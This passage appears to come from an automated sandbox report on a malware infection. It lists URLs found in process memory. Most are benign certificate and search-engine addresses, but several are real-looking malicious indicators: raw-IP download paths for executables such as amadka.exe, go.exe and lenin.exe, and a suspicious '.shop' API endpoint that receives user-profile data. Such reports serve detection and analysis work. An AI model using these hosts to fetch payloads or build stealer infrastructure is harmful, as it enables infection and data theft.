MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2824519132.0000000001444000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2762153720.0000000001440000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2758759334.000000000143F000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2874193365.000000000143F000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3081226044.0000000001440000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759980015.0000000001444000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760938757.0000000001442000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760535342.0000000001441000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2825526740.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe.lv
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.102:57893/hera/amadka.exer.dbl
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2647485220.0000000001492000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2943052576.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944589602.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944963727.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934727765.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944248868.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942019558.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940827091.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3247558222.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3351318785.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2824519132.0000000001444000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2762153720.0000000001440000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2758759334.000000000143F000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2874193365.000000000143F000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3081226044.0000000001440000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759980015.0000000001444000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760938757.0000000001442000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760535342.0000000001441000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2825526740.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/go.exe
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2647485220.0000000001492000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/go.exe4x
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/go.exehCorel.ba
Source: MPGPH131.exe, 0000001B.00000003.2943052576.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944589602.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944963727.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934727765.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944248868.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942019558.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940827091.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3247558222.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3351318785.00000000014BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/go.exemadka.ex
Source: d361f35322.exe, 00000024.00000003.2759415774.000000000143F000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002E.00000002.2637513543.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/lenin.exe
Source: RageMP131.exe, 0000002E.00000002.2637513543.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/lenin.exe1
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2647485220.0000000001492000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/lenin.exe;x
Source: d361f35322.exe, 00000009.00000003.2647485220.0000000001492000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/lenin.exea.exe68.0l
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/cost/lenin.exew.s
Source: freebl3[1].dll.51.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.51.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.51.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.51.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.51.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.51.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: powershell.exe, 0000001E.00000002.2315360912.000001D42EE5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2095956248.000001D4207A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: freebl3[1].dll.51.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.51.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.51.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.51.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.51.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 0000001E.00000002.2095956248.000001D41F008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.2095956248.000001D41F008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000001E.00000002.2095956248.000001D41EDE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.2095956248.000001D41F008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001E.00000002.2095956248.000001D41F008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: freebl3[1].dll.51.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: d361f35322.exe, 00000009.00000002.3072030296.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 0000001B.00000003.2069728672.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3349331204.0000000000701000.00000040.00000001.01000000.00000012.sdmp, MPGPH131.exe, 0000001C.00000003.2070120899.0000000005180000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2021888097.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3072062602.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000003.2138214229.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002E.00000002.2634123106.0000000000891000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: d361f35322.exe, 00000009.00000003.2768632315.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2767613201.0000000007DD3000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2912919495.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3207151088.0000000007D26000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942633187.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2823800272.0000000007D04000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760693387.0000000007CF6000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759849367.0000000007CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: d361f35322.exe, 00000024.00000003.2820673524.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2822343743.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.googl
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_h
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_s
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https
Source: d361f35322.exe, 00000024.00000003.2839809905.0000000007CCF000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2826081966.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2826875397.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2825684612.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2822343743.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2837144727.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2838516911.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2
Source: d361f35322.exe, 00000024.00000003.2825684612.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2822343743.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/id
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsig
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fa
Source: RegAsm.exe, 0000001D.00000002.2274630744.0000000000D56000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2273817779.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://affordcharmcropwo.shop/
Source: RegAsm.exe, 0000001D.00000002.2274630744.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2226894863.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://affordcharmcropwo.shop/api
Source: RegAsm.exe, 0000001D.00000002.2274630744.0000000000D56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://affordcharmcropwo.shop/apitemb
Source: RegAsm.exe, 0000001D.00000002.2273817779.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://affordcharmcropwo.shop/d
Source: RegAsm.exe, 0000001D.00000002.2273817779.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://affordcharmcropwo.shop/z
Source: RegAsm.exe, 0000001D.00000002.2226894863.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://affordcharmcropwo.shop:443/apiNAME=userUSERPROFILE=C:
Source: powershell.exe, 0000001E.00000002.2095956248.000001D41EDE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001E.00000002.2095956248.000001D41F008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2095956248.000001D420547000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001E.00000002.2095956248.000001D420547000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: jok.exe, 00000028.00000000.2051081332.00000000007C2000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: d361f35322.exe, 00000009.00000003.2768632315.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2767613201.0000000007DD3000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2912919495.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3207151088.0000000007D26000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942633187.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2823800272.0000000007D04000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760693387.0000000007CF6000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759849367.0000000007CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: d361f35322.exe, 00000009.00000003.2768632315.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2767613201.0000000007DD3000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2912919495.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3207151088.0000000007D26000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942633187.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2823800272.0000000007D04000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760693387.0000000007CF6000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759849367.0000000007CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: d361f35322.exe, 00000009.00000003.2768632315.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2767613201.0000000007DD3000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2912919495.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3207151088.0000000007D26000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942633187.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2823800272.0000000007D04000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760693387.0000000007CF6000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759849367.0000000007CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001E.00000002.2095956248.000001D4207A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.2095956248.000001D4207A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.2095956248.000001D4207A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2647485220.0000000001492000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2943052576.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944589602.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944963727.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934727765.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944248868.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942019558.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940827091.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3247558222.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3351318785.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2824519132.0000000001444000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2762153720.0000000001440000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2758759334.000000000143F000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2874193365.000000000143F000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3081226044.0000000001440000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759980015.0000000001444000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760938757.0000000001442000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760535342.0000000001441000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2825526740.0000000001443000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2762501264.0000000001441000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2647485220.0000000001492000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3350736971.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942487367.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2943052576.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2941258327.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940853881.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944589602.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944963727.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934727765.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2943456957.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944248868.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934755710.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942019558.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940827091.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3247558222.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3351318785.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2824519132.0000000001444000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3079225585.000000000140C000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2762153720.0000000001440000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2758759334.000000000143F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.104
Source: d361f35322.exe, 00000009.00000003.2647485220.0000000001492000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.1042
Source: MPGPH131.exe, 0000001B.00000003.2943052576.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944589602.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944963727.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934727765.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2944248868.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942019558.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940827091.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3247558222.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3351318785.00000000014BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.1045
Source: RageMP131.exe, 0000002E.00000002.2637513543.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.104N
Source: RageMP131.exe, 0000002E.00000002.2637513543.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.54.104XNN
Source: MPGPH131.exe, 0000001B.00000002.3350736971.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942487367.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2941258327.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940853881.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2943456957.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934755710.0000000001477000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002E.00000002.2637513543.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.54.104
Source: d361f35322.exe, 00000024.00000002.3079225585.000000000136B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.54.104r
Source: d361f35322.exe, 00000009.00000003.2768632315.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2767613201.0000000007DD3000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2912919495.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3207151088.0000000007D26000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942633187.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2823800272.0000000007D04000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760693387.0000000007CF6000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759849367.0000000007CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: d361f35322.exe, 00000009.00000003.2768632315.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2767613201.0000000007DD3000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2912919495.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3207151088.0000000007D26000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942633187.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2823800272.0000000007D04000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760693387.0000000007CF6000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759849367.0000000007CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: d361f35322.exe, 00000009.00000003.2768632315.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2767613201.0000000007DD3000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2912919495.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3207151088.0000000007D26000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942633187.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2823800272.0000000007D04000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2760693387.0000000007CF6000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2759849367.0000000007CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 0000001E.00000002.2095956248.000001D41F008000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: RageMP131.exe, 0000002E.00000002.2637513543.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002E.00000002.2637513543.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: d361f35322.exe, 00000009.00000002.3073575028.00000000013E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/5
